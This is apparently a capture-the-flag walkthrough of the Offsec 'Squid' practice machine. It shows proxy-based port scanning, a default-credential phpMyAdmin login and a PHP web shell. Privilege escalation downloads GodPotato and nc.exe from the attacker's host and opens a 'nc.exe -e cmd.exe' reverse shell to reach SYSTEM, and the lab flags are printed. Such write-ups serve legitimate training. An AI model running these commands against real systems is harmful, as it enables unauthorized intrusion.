Squid
Enumeration:
Port Scanning:
As always I am going to start with nmap to scan all open ports:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.115.189
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-09 23:24 EST
Nmap scan report for 192.168.115.189
Host is up, received echo-reply ttl 125 (0.11s latency).
Scanned at 2025-11-09 23:24:36 EST for 129s
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3128/tcp open http-proxy syn-ack ttl 125 Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsWe have smb running on port 445, and some ports related to rpc, and squid proxy on port 3128.
Squid proxy is a server proxy, that resides between the internet and the organization, and it provides a lot of features for example load balancing, etc.
HTTP (3128):
If we browsed to that port:
We can use curl to try to reach to any open port behind that proxy, if it was configured improperly.
If it was configured properly, there should be rules that prevent us to access those ports or IPs.
Lets test out:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ curl -x 192.168.115.189:3128 192.168.115.189:8080
<!DOCTYPE html>
<html>
<head>
<title>WAMPSERVER Homepage</title>
<meta charset="UTF-8">
<snipped>
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ curl -x 192.168.115.189:3128 192.168.115.189:44
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<snipped>
<div id="content">
<p>The following error was encountered while trying to retrieve the URL: <a href="http://192.168.115.189:44/">http://192.168.115.189:44/</a></p>
<blockquote id="error">
<p><b>Access Denied.</b></p>
</blockquote>
<p>Access control configuration prevents your request from being allowed at this time. Please contact your service provider if you feel this is incorrect.</p>
<p>Your cache administrator is <a href="mailto:webmaster?subject=CacheErrorInfo%20-%20ERR_ACCESS_DENIED&body=CacheHost%3A%20SQUID%0D%0AErrPage%3A%20ERR_ACCESS_DENIED%0
D%0AErr%3A%20%5Bnone%5D%0D%0ATimeStamp%3A%20Mon,%2010%20Nov%202025%2004%3A43%3A58%20GMT%0D%0A%0D%0AClientIP%3A%20192.168.45.176%0D%0A%0D%0AHTTP%20Request%3A%0D%0AGET%20%2F
%20HTTP%2F1.1%0AUser-Agent%3A%20curl%2F8.15.0%0D%0AAccept%3A%20*%2F*%0D%0AProxy-Connection%3A%20Keep-Alive%0D%0AHost%3A%20192.168.115.189%3A44%0D%0A%0D%0A%0D%0A">webmaster
</a>.</p>We can see, when I tried to access a non-existence port, I got that access denied, but when valid port, we will reach to it and get the source code.
I searched online to automate this process, and came across this blog:
It mentions a tool called spose, that can automate port scanning behind the squid proxy:
Clone it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ git clone https://github.com/aancw/spose.git
Cloning into 'spose'...
remote: Enumerating objects: 34, done.
remote: Counting objects: 100% (23/23), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 34 (delta 11), reused 17 (delta 6), pack-reused 11 (from 1)
Receiving objects: 100% (34/34), 7.89 KiB | 7.89 MiB/s, done.
Resolving deltas: 100% (11/11), done.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ cd spose
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Squid/spose]
└─$ ls -la
total 36
drwxrwxr-x 3 kali kali 4096 Nov 9 23:42 .
drwxrwxr-x 4 kali kali 4096 Nov 9 23:42 ..
drwxrwxr-x 7 kali kali 4096 Nov 9 23:42 .git
-rw-rw-r-- 1 kali kali 17 Nov 9 23:42 .gitignore
-rw-rw-r-- 1 kali kali 0 Nov 9 23:42 __init__.py
-rw-rw-r-- 1 kali kali 1060 Nov 9 23:42 LICENSE
-rw-rw-r-- 1 kali kali 845 Nov 9 23:42 README.md
-rw-rw-r-- 1 kali kali 9 Nov 9 23:42 requirements.txt
-rw-rw-r-- 1 kali kali 2973 Nov 9 23:42 spose.py
-rw-rw-r-- 1 kali kali 1225 Nov 9 23:42 url_request.pyRun it:
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Squid/spose]
└─$ python3 spose.py
usage: spose.py [-h] --proxy PROXY --target TARGET [--ports PORTS] [--allports]
Squid Pivoting Open Port Scanner
options:
-h, --help show this help message and exit
--proxy PROXY Define proxy address URL (http://x.x.x.x:3128)
--target TARGET Define target IP behind proxy
--ports PORTS [Optional] Define target ports behind proxy (comma-separated)
--allports [Optional] Scan all 65535 TCP ports behind proxy
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Squid/spose]
└─$ python3 spose.py --proxy http://192.168.115.189:3128 --target 192.168.115.189
Scanning default common ports
Using proxy address http://192.168.115.189:3128
192.168.115.189:3306 seems OPEN
192.168.115.189:8080 seems OPENWe will find two open ports behind the squid proxy. If I get stuck I will go back to this and scan all ports.
We can access that port either with the localhost IP of the target, or the target IP itself, we will get the same result:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ curl -x 192.168.115.189:3128 127.0.0.1:8080
<!DOCTYPE html>
<html>
<head>
<title>WAMPSERVER Homepage</title>
<snipped>
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ curl -x 192.168.115.189:3128 192.168.115.189:8080
<!DOCTYPE html>
<html>
<head>
<title>WAMPSERVER Homepage</title>
<snipped>Now we can easily configure foxyproxy with our squid proxy, to proxy the traffic through it, and access that port:
Go to extensions, and enable squid profile, then navigate to that port:
As shown in curl output, we have wampserver running.
Exploitation:
Lets go and open phpmyadmin:
We have a login page, I will try default credentials like root:password or root:''.
Root as the username and with not password we successfully logged in:
Click on the SQL tab to move to it:
Here we can write queries, and it will be executed by the backend mysql dbms.
We can inject a php malicious simple script to allow us execute code on the underlying operating system, but we need to know the structure of wamp so we can place our payload in the right place.
I searched online for wamp file structure, and get that response from the search integrated ai:
PhpMyAdmin usually resides under www, so I will use some query to write a simple php script to that directory, and specify a name:
Now lets go to that file in our browser, and see if we can execute some code:
Indeed we can, I will set up a netcat listener, and get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ... 
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.115.189] 50201
PS C:\wamp\www>Post-Exploitation:
PS C:\wamp\www> whoami /all
USER INFORMATION
----------------
User Name SID
========================== ========
nt authority\local service S-1-5-19
<snipped>
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSystemtimePrivilege Change the system time Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledHere we have a shell, I ran whoami /all and found we have SeImpersonatePrivilege Privilege, I will upload godpotato, but we can use any such a tool like other potatos, or printspoofer, etc.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...PS C:\Users> cd \Windows\Tasks
PS C:\Windows\Tasks> curl http://192.168.45.187/GodPotato-NET4.exe -o GodPotato-NET4.exe
PS C:\Windows\Tasks> curl http://192.168.45.187/nc.exe -o nc.exe
PS C:\Windows\Tasks> dir
Directory: C:\Windows\Tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/9/2025 9:01 PM 57344 GodPotato-NET4.exe
-a---- 11/9/2025 9:01 PM 59392 nc.exe
Start another netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ... PS C:\Windows\Tasks> .\GodPotato-NET4.exe -cmd "C:\Windows\Tasks\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.187 80"┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.115.189] 50207
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\Tasks>whoami
whoami
nt authority\system
Get the flags:
C:\Windows\Tasks>cd \Users
cd \Users
C:\Users>tree /f /a
tree /f /a
Folder PATH listing
Volume serial number is 5C30-DCD7
C:.
+---Administrator
| +---3D Objects
| +---Contacts
| +---Desktop
| | proof.txt
| |
| +---Documents
| +---Downloads
| +---Favorites
| | | Bing.url
| | |
| | \---Links
| +---Links
| | Desktop.lnk
| | Downloads.lnk
| |
| +---Music
| +---Pictures
| +---Saved Games
| +---Searches
| \---Videos
\---Public
+---Documents
+---Downloads
+---Music
+---Pictures
\---Videos
C:\Users>cd Administrator\Desktop
cd Administrator\Desktop
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
ffa444574da43c6b3ce1a3db6885fe13
C:\Users\Administrator\Desktop>type C:\local.txt
type C:\local.txt
7db6da2be3ef5643fc6573993745729dLast updated